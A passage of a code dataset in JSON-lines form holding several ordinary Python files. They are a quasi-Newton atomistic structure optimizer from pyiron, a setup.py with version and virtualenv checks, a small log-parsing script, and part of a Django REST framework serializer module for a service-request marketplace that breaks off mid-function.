self._eigenvectors = None\n self.regularization = None\n\n def _calc_eig(self):\n self._eigenvalues, self._eigenvectors = np.linalg.eigh(self.hessian)\n\n @property\n def eigenvalues(self):\n if self._eigenvalues is None:\n self._calc_eig()\n return self._eigenvalues\n\n @property\n def eigenvectors(self):\n if self._eigenvectors is None:\n self._calc_eig()\n return self._eigenvectors\n\n def get_dx(self, g, threshold=1e-4, mode=\"PSB\", update_hessian=True):\n if update_hessian:\n self.update_hessian(g, threshold=threshold, mode=mode)\n self.dx = -np.einsum(\"ij,j->i\", self.inv_hessian, g.flatten()).reshape(-1, 3)\n if self.symmetry is not None:\n self.dx = self.symmetry.symmetrize_vectors(self.dx)\n if (\n np.linalg.norm(self.dx, axis=-1).max() > self.max_displacement\n and self.regularization is None\n ):\n self._set_regularization(g=g.flatten())\n return self.get_dx(\n g=g, threshold=threshold, mode=mode, update_hessian=False\n )\n return self.dx\n\n @staticmethod\n def _get_SR(dx, dg, H_tmp, threshold=1e-4):\n denominator = np.dot(H_tmp, dx)\n if np.absolute(denominator) < threshold:\n denominator += threshold\n return np.outer(H_tmp, H_tmp) / denominator\n\n @staticmethod\n def _get_PSB(dx, dg, H_tmp):\n dxdx = np.einsum(\"i,i->\", dx, dx)\n dH = np.einsum(\"i,j->ij\", H_tmp, dx)\n dH = (dH + dH.T) / dxdx\n return (\n dH\n - np.einsum(\"i,i,j,k->jk\", dx, H_tmp, dx, dx, optimize=\"optimal\")\n / dxdx**2\n )\n\n @staticmethod\n def _get_BFGS(dx, dg, H):\n Hx = H.dot(dx)\n return np.outer(dg, dg) / dg.dot(dx) - np.outer(Hx, Hx) / dx.dot(Hx)\n\n def update_hessian(self, g, threshold=1e-4, mode=\"PSB\"):\n if self.g_old is None:\n self.g_old = g\n return\n dg = self.get_dg(g).flatten()\n dx = self.dx.flatten()\n H_tmp = dg - np.einsum(\"ij,j->i\", self.hessian, dx)\n if mode == \"SR\":\n self.hessian = self._get_SR(dx, dg, H_tmp) + self.hessian\n elif mode == \"PSB\":\n self.hessian = self._get_PSB(dx, dg, H_tmp) + self.hessian\n elif mode == \"BFGS\":\n self.hessian = self._get_BFGS(dx, dg, self.hessian) + self.hessian\n else:\n raise ValueError(\n \"Mode not recognized: {}. Choose from `SR`, `PSB` and `BFGS`\".format(\n mode\n )\n )\n self.g_old = g\n\n def get_dg(self, g):\n return g - self.g_old\n\n\ndef run_qn(\n job,\n mode=\"PSB\",\n ionic_steps=100,\n ionic_force_tolerance=1.0e-2,\n ionic_energy_tolerance=0,\n starting_h=10,\n diffusion_id=None,\n diffusion_direction=None,\n use_eigenvalues=True,\n symmetrize=True,\n max_displacement=0.1,\n min_displacement=1.0e-8,\n):\n \"\"\"\n Args:\n job (pyiron): pyiron job\n mode (str): Hessian update scheme. `PSB`, `SR` and `BFGS` are currently available.\n ionic_steps (int): Maximum number of steps.\n ionic_force_tolerance (float): Maximum force of an atom tolerated for convergence\n ionic_energy_tolerance (float): Maximum energy difference for convergence\n starting_H (float/ndarray): Starting Hessian value (diagonal value or total Hessian)\n diffusion_id (int/None): Atom id at saddle point. No need to define if the structure\n is close enough to the saddle point. This has to be defined together with\n `diffusion_direction`.\n use_eigenvalues (bool): Whether to use the eigenvalue softening or standard Tikhonov\n regularization to prevent unphysical displacement.\n symmetrize (bool): Whether to symmetrize forces following the box symmetries. DFT\n calculations might fail if set to `False`\n max_displacement (float): Maximum displacement allowed for an atom.\n min_displacement (float): Minimum displacement for a system to rerun\n\n Returns:\n qn (QuasiNewtonInteractive): Quasi Newton class variable\n \"\"\"\n qn = QuasiNewtonInteractive(\n structure=job.structure,\n starting_h=starting_h,\n diffusion_id=diffusion_id,\n diffusion_direction=diffusion_direction,\n use_eigenvalues=use_eigenvalues,\n max_displacement=max_displacement,\n symmetrize=symmetrize,\n )\n job.run()\n for _ in range(ionic_steps):\n f = job.output.forces[-1]\n if np.linalg.norm(f, axis=-1).max() < ionic_force_tolerance:\n break\n dx = qn.get_dx(-f, mode=mode)\n if np.linalg.norm(dx, axis=-1).max() < min_displacement:\n warnings.warn(\"line search alpha is zero\")\n break\n job.structure.positions += dx\n job.structure.center_coordinates_in_unit_cell()\n if job.server.run_mode.interactive:\n job.run()\n else:\n job.run(delete_existing_job=True)\n return qn\n\n\nclass QuasiNewton(InteractiveWrapper):\n\n \"\"\"\n Structure optimization scheme via Quasi-Newton algorithm.\n\n Example:\n\n >>> from pyiron_atomistics import Project\n >>> spx = pr.create.job.Sphinx('spx')\n >>> spx.structure = pr.create.structure.bulk('Al')\n >>> spx.structure[0] = 'Ni'\n >>> spx.interactive_open()\n >>> qn = spx.create_job('QuasiNewton', 'qn')\n >>> qn.run()\n\n Currently, there are three Hessian update schemes available (cf. `qn.input.mode`):\n\n - `PSB`: Powell-Symmetric-Broyden\n - `SR`: Symmetric-Rank-One\n - `BFGS`: Broyden–Fletcher–Goldfarb–Shanno\n\n `PBS` and `SR` do not enforce positive definite Hessian matrix, meaning they can be used to\n obtain an energy barrier state. An energy barrier state calculation is automatically\n performed if the system is within a harmonic distance from the saddle point. If, however,\n the diffusion direction is already known, this information can be inserted in\n `qn.input.diffusion_direction` and the atom id in `qn.input.diffusion_id`.\n\n There are two types of regularization: Tikhonov regularization and eigenvalue softening\n (`qn.input.use_eivenvalues = True`: eigenvalue softening, `... = False`: Tihkonov\n regularization). In both cases, the regularization value is increased until the largest\n displacement is smaller than `qn.input.max_displacement`.\n\n Tikhonov regularization:\n\n `x = (H + L)^{-1} * f`\n\n where `x` is the displacement field, `H` is the Hessian matrix, `L` is the regularization\n matrix and `f` is the force field. The regularization values get an opposite sign for the\n directions along the negative eigenvalues, to make sure that the regularization indeed\n regularizes when there is a saddle point configuration.\n\n Eigenvalue softening:\n\n `x = M * (d / (d^2 + L)) * M^{-1} * f`\n\n where `M` is the eigenvector matrix, `d` are the eigenvalues and `L` is the regularization.\n \"\"\"\n\n def __init__(self, project, job_name):\n super().__init__(project, job_name)\n\n self.__version__ = None\n self.input = Input()\n self.output = Output(self)\n self._interactive_interface = None\n self.qn = None\n\n __init__.__doc__ = InteractiveWrapper.__init__.__doc__\n\n def _run(self):\n self.qn = run_qn(\n job=self.ref_job,\n mode=self.input[\"mode\"],\n ionic_steps=self.input[\"ionic_steps\"],\n ionic_force_tolerance=self.input[\"ionic_force_tolerance\"],\n ionic_energy_tolerance=self.input[\"ionic_energy_tolerance\"],\n starting_h=self.input[\"starting_h\"],\n diffusion_id=self.input[\"diffusion_id\"],\n diffusion_direction=self.input[\"diffusion_direction\"],\n use_eigenvalues=self.input[\"use_eigenvalues\"],\n symmetrize=self.input[\"symmetrize\"],\n max_displacement=self.input[\"max_displacement\"],\n )\n self.collect_output()\n\n def run_static(self):\n self.status.running = True\n self.ref_job_initialize()\n self._run()\n if self.ref_job.server.run_mode.interactive:\n self.ref_job.interactive_close()\n self.status.collect = True\n self.run()\n\n run_static.__doc__ = InteractiveWrapper.run_static.__doc__\n\n def interactive_close(self):\n self.status.collect = True\n if self.ref_job.server.run_mode.interactive:\n self.ref_job.interactive_close()\n self.run()\n\n interactive_close.__doc__ = InteractiveWrapper.interactive_close.__doc__\n\n def write_input(self):\n pass\n\n def collect_output(self):\n self.output._index_lst.append(len(self.ref_job.output.energy_pot))\n if self.qn is not None:\n self.output.hessian = self.qn.hessian\n self.output.to_hdf(hdf=self.project_hdf5)\n\n collect_output.__doc__ = InteractiveWrapper.collect_output.__doc__\n\n\nclass Input(GenericParameters):\n \"\"\"\n class to control the generic input for a Sphinx calculation.\n\n Args:\n input_file_name (str): name of the input file\n table_name (str): name of the GenericParameters table\n \"\"\"\n\n def __init__(self, input_file_name=None, table_name=\"input\"):\n super(Input, self).__init__(\n input_file_name=input_file_name,\n table_name=table_name,\n comment_char=\"//\",\n separator_char=\"=\",\n end_value_char=\";\",\n )\n\n __init__.__doc__ = GenericParameters.__init__.__doc__\n\n def load_default(self):\n file_content = (\n \"mode = 'PSB'\\n\"\n \"ionic_steps = 100\\n\"\n \"ionic_force_tolerance = 1.0e-2\\n\"\n \"ionic_energy_tolerance = 0\\n\"\n \"starting_h = 10\\n\"\n \"diffusion_id = None\\n\"\n \"use_eigenvalues = True\\n\"\n \"diffusion_direction = None\\n\"\n \"symmetrize = True\\n\"\n \"max_displacement = 0.1\\n\"\n )\n self.load_string(file_content)\n\n\nclass Output(ReferenceJobOutput):\n def __init__(self, job):\n super().__init__(job=job)\n self._index_lst = []\n self.hessian = None\n\n @property\n def index_lst(self):\n return np.asarray(self._index_lst)\n\n def to_hdf(self, hdf, group_name=\"output\"):\n if self.hessian is not None:\n with hdf.open(group_name) as hdf_output:\n hdf_output[\"hessian\"] = self.hessian\n","sub_path":"pyiron_atomistics/interactive/quasi_newton.py","file_name":"quasi_newton.py","file_ext":"py","file_size_in_byte":14738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248106841","text":"import os\nimport sys\nfrom setuptools import setup, find_packages\n\nnot_found_msg = \"\"\"\nFile Not Found ({fname}).\nCheck the file and restart again\n\"\"\"\n\n\ndef get_file_content(fname):\n fname = os.path.abspath(os.path.dirname(__file__)) + \"/\" + fname\n exists = os.path.isfile(fname)\n if not exists:\n print(not_found_msg.format(fname=fname))\n sys.exit(1)\n with open(fname) as f:\n return f.read()\n\n\nCURRENT_PYTHON = sys.version_info[:2]\nREQUIRED_PYTHON = (3, 6)\n#: This check and everything above must remain compatible with requiered Python\nif CURRENT_PYTHON < REQUIRED_PYTHON:\n quant_language = 2\n print(get_file_content(\"setup/required_python.txt\").format(*(\n quant_language * (REQUIRED_PYTHON + CURRENT_PYTHON))))\n sys.exit(1)\n\n\n\"\"\"\nInside a virtualenv, sys.prefix points to the virtualenv directory, and\nsys.real_prefix points to the \"real\" prefix of the system Python (often /usr or\n/usr/local or some such).\n\nOutside a virtualenv, sys.real_prefix should not exist.\n\"\"\"\n#: This Check if this script is running into virtual environment\nif not hasattr(sys, \"real_prefix\"):\n print(\"\"\"ERROR: The virtual environment is not activated!\"\"\")\n sys.exit(1)\n\n\nPROJECT_NAME = \"clv_common_py\"\nPROJECT_VERSION = \"2019.07.23.1\"\nPROJECT_DESCRIPTION = \"Common project that sets the default configuration.\"\nLONG_DESC = get_file_content(\"README.md\")\nREQUIRES = get_file_content(\"requirements.txt\").splitlines()\n\nsetup(\n #: - - - - - name - - - - -\n #: The name of the package\n #: a string\n name=PROJECT_NAME,\n\n #: - - - - - version - - - - -\n #: The version number of the package; see distutils.version\n #: a string\n version=PROJECT_VERSION,\n\n #: - - - - - install_requires - - - - -\n #: A list of standalone script files to be built and installed\n #: a list of strings\n install_requires=REQUIRES,\n\n #: - - - - - description - - - - -\n #: A single line describing the package\n #: a string\n description=PROJECT_DESCRIPTION,\n\n #: - - - - - long_description - - - - -\n #: Longer description of the package\n #: a string\n long_description=LONG_DESC,\n\n #: - - - - - packages - - - - -\n #: A list of Python packages that distutils will manipulate\n #: a list of strings\n packages=find_packages(\"config\"),\n\n #: - - - - - package_dir - - - - -\n #:\n package_dir={\"\": \"config\"},\n\n #: - - - - - author - - - - -\n #: The name of the package author\n #: a string\n # author=\"\",\n\n #: - - - - - author_email - - - - -\n #: The email address of the package author\n #: a string\n # author_email=\"\",\n\n #: - - - - - maintainer - - - - -\n #: The name of the current maintainer, if different from the author.\n #: Note that if the maintainer is provided, distutils will use it as\n #: the author in PKG-INFO\n #: a string\n # maintainer=\"\",\n\n #: - - - - - maintainer_email - - - - -\n #: The email address of the current maintainer, if different from the\n #: author\n #: a string\n # maintainer_email=\"\",\n\n #: - - - - - url - - - - -\n #: A URL for the package (homepage)\n #: a string\n # url=\"\",\n\n #: - - - - - download_url - - - - -\n #: A URL to download the package\n #: a string,\n # download_url=\"\",\n\n #: - - - - - py_modules - - - - -\n #: A list of Python modules that distutils will manipulate\n #: a list of strings\n # py_modules=[\"config.clv_base\", \"config.http\"],\n\n #: - - - - - scripts - - - - -\n #: A list of standalone script files to be built and installed\n #: a list of strings\n # scripts=[\"\"],\n\n #: - - - - - ext_modules - - - - -\n #: A list of Python extensions to be built\n #: a list of instances of distutils.core.Extension\n # ext_modules=[\"\"],\n\n #: - - - - - classifiers - - - - -\n #: A list of categories for the package\n #: a list of strings; valid classifiers are listed on PyPI.\n # classifiers=[\"\"],\n\n #: - - - - - script_name - - - - -\n #: The name of the setup.py script - defaults to sys.argv[0]\n #: a string\n # script_name=\"\",\n\n #: - - - - - script_args - - - - -\n #: Arguments to supply to the setup script\n #: a list of strings\n # script_args=[\"\"],\n\n #: - - - - - options - - - - -\n #: default options for the setup script\n #: a dictionary\n # options={\"\"},\n\n #: - - - - - license - - - - -\n #: The license for the package\n #: a string\n # license=\"\",\n\n #: - - - - - keywords - - - - -\n #: Descriptive meta-data, see PEP 314\n #: a list of strings or a comma-separated string\n # keywords=\"\" | [\"\"],\n\n #: - - - - - platforms - - - - -\n #: a list of strings or a comma-separated string\n # platforms=[\"\"],\n\n #: - - - - - cmdclass - - - - -\n #: A mapping of command names to Command subclasses\n #: a dictionary\n # cmdclass={\"\"},\n\n #: - - - - - data_files - - - - -\n #: A list of data files to install\n #: a list\n # data_files=[\"\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652675475","text":"#!/usr/bin/python3.9\n# You run this script providing the name of a log file. For example, ./pars.py --log-file=cri-o.log\n\nimport sys\nimport os\n\npath = sys.argv[1]\nfile_name = path.split(\"=\")\n\nread = open(file_name[1])\nlines = read.readlines()\noutput = open(\"parsed_log.log\", \"w\")\n\nfor line in lines:\n lst=(line.split(\" \"))\n print('{' + '\\n' + '\\t' + '\"@timestamp\": ' + lst[0] + ',' + '\\n' + '\\t' + '\"stream\": ' + lst[1] + ',' + '\\n' + '\\t' + '\"log\": ' + ' '.join(map(str, lst[16:-1])) + '\\n' + '}', file = output)\n\nread.close()\noutput.close()\n","sub_path":"pars.py","file_name":"pars.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502045067","text":"from urllib.parse import quote\nimport datetime as dt\nimport functools\n\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom rest_framework.reverse import reverse\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework import serializers, fields\n\nfrom rest_framework_mongoengine.serializers import (\n DocumentSerializer, EmbeddedDocumentSerializer)\n\nfrom asilinks.validators import file_max_size, FileMimetypeValidator\nfrom .documents import (Request, RoundPartner, Message,\n TimeExtension, Review)\nfrom .tasks import select_round_partners\nfrom authentication.documents import Account\nfrom main.documents import Client, Partner\nfrom main.serializers import ExtraDescriptionSerializer\nfrom payments.documents import Transaction, Bill\nfrom payments.interfaces import get_interface, ContextInterfaceError\n\nfrom admin.notification import CLIENT_MESSAGES, PARTNER_MESSAGES\n\n__all__ = [\n 'MakeRequestSerializer', 'MessageSerializer', 'ClientSerializer',\n 'OfferPartnerSerializer', 'DetailRequestSerializer', 'ListRequestSerializer',\n 'PartnerSerializer', 'RoundPartnerSerializer', 'ReviewRequestSerializer',\n 'OfferSerializer', 'TimeExtensionSerializer', 'SendMessageSerializer',\n 'PaymentTokenSerializer', 'RejectRequestSerializer',\n 'CancelRequestSerializer', 'AcceptOfferSerializer', 'SubmitRequestSerializer',\n 'ReceiveRequestSerializer', 'UnsatisfiedRequestSerializer', 'CloseRequestSerializer',\n 'RequestStatisticsSerializer',\n]\n\n\nclass MessageListSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n merged_data = []\n\n for item in data.filter(reference_ts=None):\n rep = self.child.to_representation(item)\n\n try:\n rep['response'] = self.child.to_representation(\n data.get(reference_ts=item.ts))\n except:\n rep['response'] = None\n\n merged_data.append(rep)\n\n return merged_data\n\n\nclass MessageSerializer(EmbeddedDocumentSerializer):\n type = fields.ChoiceField(choices=Message.TYPE_CHOICES,\n default=Message.TYPE_TEXT, write_only=True, required=False)\n attachment = fields.FileField(max_length=None, use_url=True,\n required=False, validators=[file_max_size])\n type_display = serializers.SerializerMethodField()\n is_your = serializers.SerializerMethodField()\n is_client = serializers.SerializerMethodField()\n owner = serializers.SlugRelatedField(\n slug_field='first_name', read_only=True)\n\n class Meta:\n model = Message\n list_serializer_class = MessageListSerializer\n fields = ('content', 'owner', 'ts', 'content', 'type', 'type_display',\n 'attachment', 'last_delivery', 'is_your', 'is_client', )\n extra_kwargs = {\n 'last_delivery': {'default': False},\n }\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment', mimetype_field='type')\n ]\n\n def get_type_display(self, obj):\n return obj.get_type_display()\n\n def get_is_your(self, obj):\n return obj.owner == self.context['request'].user\n\n def get_is_client(self, obj):\n return obj.owner == self.parent.parent.instance.client.account\n\n def validate(self, data):\n\n if data['type'] == Message.TYPE_TEXT:\n data.pop('attachment', None)\n\n if not data.get('content'):\n raise ValidationError(\n {'content': _('El mensaje no tiene contenido.')}\n )\n\n else:\n # data.pop('content', None)\n attachment = data.get('attachment')\n\n if not attachment:\n raise ValidationError(\n {'attachment': _('El mensaje no tiene archivo adjunto.')}\n )\n\n return data\n\n\nclass ClientSerializer(DocumentSerializer):\n full_name = fields.ReadOnlyField(source='account.get_full_name')\n\n class Meta:\n model = Client\n fields = ('id', 'rating', 'full_name', )\n\n\nclass PartnerSerializer(DocumentSerializer):\n full_name = fields.ReadOnlyField(source='account.get_full_name')\n residence = serializers.StringRelatedField(source='account.residence')\n\n class Meta:\n model = Partner\n fields = ('id', 'level', 'rating', 'full_name', 'residence')\n\n\nclass ListRoundPartnerSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n # oculta los round partners que no han publicado oferta\n return super().to_representation(data.exclude(price=None))\n\n\nclass RoundPartnerSerializer(EmbeddedDocumentSerializer):\n partner = PartnerSerializer()\n links = serializers.SerializerMethodField()\n new = serializers.SerializerMethodField()\n\n class Meta:\n model = RoundPartner\n list_serializer_class = ListRoundPartnerSerializer\n fields = ('partner', 'links', 'last_read', 'price', 'new',\n 'description', 'duration', 'requisites', )\n\n def get_links(self, instance):\n request = self.context['request']\n # view = self.context['view']\n\n return {\n 'self': reverse('partner-detail',\n kwargs={'id': instance.partner.id}, request=request),\n }\n\n def get_new(self, instance):\n parent = self.context['view'].get_object()\n\n return instance.date_response > parent.last_read_client\n\n\nclass OfferPartnerSerializer(EmbeddedDocumentSerializer):\n\n class Meta:\n model = RoundPartner\n fields = '__all__'\n\n\nclass MakeRequestSerializer(DocumentSerializer):\n english_level = fields.CharField(write_only=True, required=False)\n estimated_duration = fields.CharField(write_only=True, required=False)\n advance_notion = fields.CharField(write_only=True, required=False)\n attachment = fields.FileField(max_length=None, use_url=True,\n required=False, write_only=True, validators=[file_max_size])\n skills = fields.ListField(write_only=True, required=False,\n child=serializers.CharField()\n )\n\n round_partners = RoundPartnerSerializer(many=True, read_only=True)\n partner = PartnerSerializer(read_only=True)\n\n questions = MessageSerializer(many=True, read_only=True)\n com_channel = MessageSerializer(many=True, read_only=True)\n status_display = serializers.SerializerMethodField()\n new_messages = serializers.SerializerMethodField()\n last_read = serializers.SerializerMethodField()\n new_offers = serializers.ReadOnlyField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'description', 'extra_description', 'know_fields', 'date_created',\n 'questions', 'com_channel', 'country_alpha2', 'penalty_discount', 'round_partners',\n 'partner', 'partner_review', 'client_review', 'status_display', 'status', 'skills',\n 'english_level', 'estimated_duration', 'advance_notion', 'attachment', 'date_promise',\n 'new_messages', 'last_read', 'new_offers', )\n read_only_fields = ('id', 'date_created', 'extra_description','penalty_discount',\n 'partner_review', 'client_review', 'status', 'date_promise', )\n extra_kwargs = {\n 'name': {'required': True},\n 'description': {'required': True},\n 'know_fields': {'required': True, 'min_length': 1},\n }\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment')\n ]\n\n def to_representation(self, obj):\n self.fields['know_fields'] = serializers.StringRelatedField(many=True)\n return super().to_representation(obj)\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def get_new_messages(self, obj):\n account = self.context['request'].user\n return obj.new_messages(account)\n\n def get_last_read(self, obj):\n account = self.context['request'].user\n return obj.get_last_read(account).strftime('%s.%f')\n\n def validate(self, data):\n extra = ExtraDescriptionSerializer(data=data)\n extra.is_valid(raise_exception=True)\n\n return data\n\n def create(self, validated_data):\n attachment = validated_data.pop('attachment', None)\n extra = ExtraDescriptionSerializer(data=validated_data)\n extra.is_valid()\n [validated_data.pop(key, None) for key in ('estimated_duration',\n 'english_level', 'advance_notion', 'skills')]\n\n instance = super().create(validated_data)\n update = {\n 'extra_description':extra.save()\n }\n\n if attachment:\n _type = Message.TYPE_DOC if attachment.content_type in Message.CONTENT_TYPES[\n Message.TYPE_DOC] else Message.TYPE_IMAGE\n message = Message(ts=dt.datetime.now(), owner=self.context['request'].user,\n attachment=attachment, type=_type)\n\n message.attachment.save(message.attachment.name, \n message.attachment, save=False)\n update['push__questions'] = message\n\n instance.modify(**update)\n instance.client.modify(push__requests_todo=instance, last_activity=dt.datetime.now())\n select_round_partners(str(instance.id))\n # select_round_partners.delay(str(instance.id))\n\n return instance\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.description = validated_data.get('description', instance.description)\n\n extra = ExtraDescriptionSerializer(instance.extra_description,\n data=validated_data, partial=True)\n extra.is_valid()\n\n instance.extra_description = extra.save()\n instance.save()\n\n for rp in instance.round_partners:\n if not rp.rejected:\n rp.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['updated_description_requirement'])\n return instance\n\n\nclass DetailRequestSerializer(DocumentSerializer):\n round_partners = RoundPartnerSerializer(many=True)\n partner = PartnerSerializer()\n client = ClientSerializer()\n\n know_fields = serializers.StringRelatedField(many=True)\n questions = MessageSerializer(many=True)\n com_channel = MessageSerializer(many=True)\n\n status_display = serializers.SerializerMethodField()\n your_offer = serializers.SerializerMethodField()\n new_messages = serializers.SerializerMethodField()\n last_read = serializers.SerializerMethodField()\n can_cancel = serializers.SerializerMethodField()\n pending_extension = serializers.SerializerMethodField()\n new_offers = serializers.ReadOnlyField()\n\n class Meta: \n model = Request\n fields = ('id', 'name', 'know_fields', 'description', 'questions', 'com_channel',\n 'client', 'partner', 'round_partners', 'status_display', 'status',\n 'date_created', 'date_promise', 'penalty_discount', 'your_offer',\n 'partner_review', 'client_review', 'extra_description', 'country_alpha2',\n 'new_messages', 'last_read', 'new_offers', 'can_cancel', 'pending_extension', )\n\n def __init__(self, instance, *args, **kwargs):\n if instance.status < Request.STATUS_PENDING:\n\n last_delivery = instance.com_channel.filter(last_delivery=True)\n last_delivery.update(content='', attachment=None)\n\n instance.com_channel = instance.com_channel.exclude(\n last_delivery=True)\n [instance.com_channel.append(item) for item in last_delivery]\n\n super().__init__(instance, *args, **kwargs)\n\n def get_field_names(self, declared_fields, info):\n fields = super().get_field_names(declared_fields, info)\n account = self.context['request'].user\n\n if self.instance.client == account.client_profile:\n fields_to_delete = {'client', 'your_offer'}\n else:\n fields_to_delete = {'partner', 'round_partners', 'new_offers',\n 'can_cancel', 'pending_extension'}\n\n return list(set(fields) - fields_to_delete)\n\n def get_your_offer(self, obj):\n account = self.context['request'].user\n\n try:\n round_partner = obj.round_partners.get(partner=account.partner_profile)\n except:\n return None\n\n if not round_partner.date_response:\n return None\n\n serializer = OfferPartnerSerializer(round_partner)\n return serializer.data\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def get_new_messages(self, obj):\n account = self.context['request'].user\n return obj.new_messages(account)\n\n def get_last_read(self, obj):\n account = self.context['request'].user\n return obj.get_last_read(account).strftime('%s.%f')\n\n def get_can_cancel(self, obj):\n return obj.can_be_canceled()\n\n def get_pending_extension(self, obj):\n return any(item.approve is None for item in obj.time_extensions)\n\n\nclass ListRequestSerializer(DocumentSerializer):\n client = serializers.StringRelatedField()\n partner = serializers.StringRelatedField()\n know_fields = serializers.StringRelatedField(many=True)\n status_display = serializers.SerializerMethodField()\n your_offer = serializers.SerializerMethodField()\n offers_count = serializers.SerializerMethodField()\n new_messages = serializers.SerializerMethodField()\n new_offers = serializers.ReadOnlyField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'client', 'partner',\n 'status', 'status_display', 'offers_count', 'your_offer', \n 'date_promise', 'date_created', 'new_messages', 'new_offers', )\n\n def get_field_names(self, declared_fields, info):\n fields = super().get_field_names(declared_fields, info)\n profile_type = self.context['request'].query_params.get('profile', 'client')\n\n if 'partner' in profile_type:\n fields_to_delete = {'partner', 'round_partners', 'offers_count', 'new_offers'}\n else:\n fields_to_delete = {'client', 'your_offer'}\n\n return list(set(fields) - fields_to_delete)\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def get_your_offer(self, obj):\n account = self.context['request'].user\n round_partner = obj.round_partners.get(partner=account.partner_profile)\n if round_partner.date_response and not round_partner.rejected:\n return True\n return False\n\n def get_offers_count(self, obj):\n return obj.round_partners.exclude(price=None).count()\n\n def get_new_messages(self, obj):\n account = self.context['request'].user\n return obj.new_messages(account)\n\n\nclass OfferSerializer(EmbeddedDocumentSerializer):\n\n class Meta:\n model = RoundPartner\n fields = ('requisites', 'description', 'duration', 'price',\n 'date_response', 'last_activity')\n extra_kwargs = {\n 'description': {'required': True},\n 'price': {'required': True, 'min_value': 20, \"error_messages\":\n {\"min_value\": \"El costo de la propuesta debe ser mayor o igual a 20.\"}},\n 'date_response': {'read_only': True},\n 'last_activity': {'read_only': True},\n }\n\n\nclass TimeExtensionSerializer(EmbeddedDocumentSerializer):\n\n class Meta:\n model = TimeExtension\n fields = ('duration', 'excuse', 'approve', \n 'date_created', 'date_closed')\n read_only_fields = ('date_created', 'date_closed', )\n\n def validate(self, data):\n now = dt.datetime.now()\n owner = self.context['request'].user\n\n if owner.partner_profile == self.instance.partner:\n if self.instance.time_extensions.count() >= 2:\n raise ValidationError({\n 'message':_('La prórroga solicitada no procede.')})\n\n if not 'duration' in data or not 'excuse' in data:\n raise ValidationError({\n 'duration': self.error_messages['required'],\n 'excuse': self.error_messages['required'],\n })\n\n if self.instance.date_promise < now + dt.timedelta(hours=48):\n raise ValidationError({\n 'message':_(\"Se ha vencido el plazo para solicitar extensiones de tiempo.\")})\n\n duration = self.instance.round_partners.get(partner=self.instance.partner).duration\n if data['duration'] > duration / 2:\n raise ValidationError({\n 'message': _('No puede solicitar mas tiempo que la mitad de la duración de su propuesta.'),\n 'max_duration': str(duration / 2)})\n\n if self.instance.time_extensions.count() == 0:\n return {\n 'duration': data['duration'],\n 'excuse': data['excuse'],\n 'approve': True,\n 'date_created': now,\n 'date_closed': now,\n }\n else:\n return {\n 'duration': data['duration'],\n 'excuse': data['excuse'],\n 'approve': None,\n 'date_created': now,\n }\n\n elif owner.client_profile == self.instance.client:\n if self.instance.time_extensions.count() >= 2:\n if not 'approve' in data:\n raise ValidationError({\n 'approve': self.error_messages['required'],\n })\n\n if self.instance.time_extensions[-1].approve is None:\n return {\n 'approve': data['approve'],\n 'date_closed': now,\n }\n\n raise ValidationError({\n 'message':_('No tiene extensiones de tiempo por aprobar.')})\n\n else:\n raise ValidationError({'message':_('No está asociado a este requerimiento.')})\n\n def update(self, instance, validated_data):\n owner = self.context['request'].user\n\n if owner.partner_profile == self.instance.partner:\n extension = TimeExtension(**validated_data)\n instance.modify(push__time_extensions=extension)\n\n self.instance.client.account.send_message(context={'request': self.instance},\n data={'request_id': str(self.instance.id), 'profile': 'client'},\n **CLIENT_MESSAGES['extension_requested'])\n\n else:\n extension = instance.time_extensions[-1]\n extension.approve = validated_data['approve']\n extension.date_closed = validated_data['date_closed']\n instance.modify(pop__time_extensions=1)\n instance.modify(push__time_extensions=extension)\n\n if extension.approve == True:\n promise = functools.reduce(lambda x,y: x+y, [\n instance.date_started, \n instance.round_partners.get(partner=instance.partner).duration, \n *[item.duration for item in instance.time_extensions]\n ])\n instance.modify(date_promise=promise)\n\n # Send notification telling that the extension was aproved\n self.instance.partner.account.send_message(\n data={'request_id': str(self.instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['extension_approved'])\n else:\n # Send notification telling that the extension was rejected\n self.instance.partner.account.send_message(\n data={'request_id': str(self.instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['extension_rejected'])\n\n return extension\n\n\nclass SendMessageSerializer(DocumentSerializer):\n content = fields.CharField(max_length=5000, write_only=True)\n type = fields.ChoiceField(choices=Message.TYPE_CHOICES, \n default=Message.TYPE_TEXT, write_only=True, required=False)\n attachment = fields.FileField(max_length=None, use_url=True, \n write_only=True, required=False, validators=[file_max_size])\n last_delivery = fields.BooleanField(write_only=True, default=False)\n reference_ts = fields.FloatField(write_only=True, default=None)\n\n client = fields.CharField(read_only=True, source='client.account.get_full_name')\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n questions = MessageSerializer(read_only=True, many=True)\n com_channel = MessageSerializer(read_only=True, many=True)\n status_display = serializers.SerializerMethodField()\n\n class Meta:\n model = Request\n fields = ('client', 'know_fields', 'questions', 'com_channel',\n 'status_display', 'content', 'type', 'attachment', \n 'last_delivery', 'reference_ts', 'status', )\n read_only_fields = ('client', 'know_fields', 'questions',\n 'com_channel', 'status_display', 'status', )\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment', mimetype_field='type')\n ]\n\n def get_status_display(self, instance):\n return instance.get_status_display()\n\n def validate(self, data):\n\n if data['reference_ts'] is not None:\n try:\n reference_ts 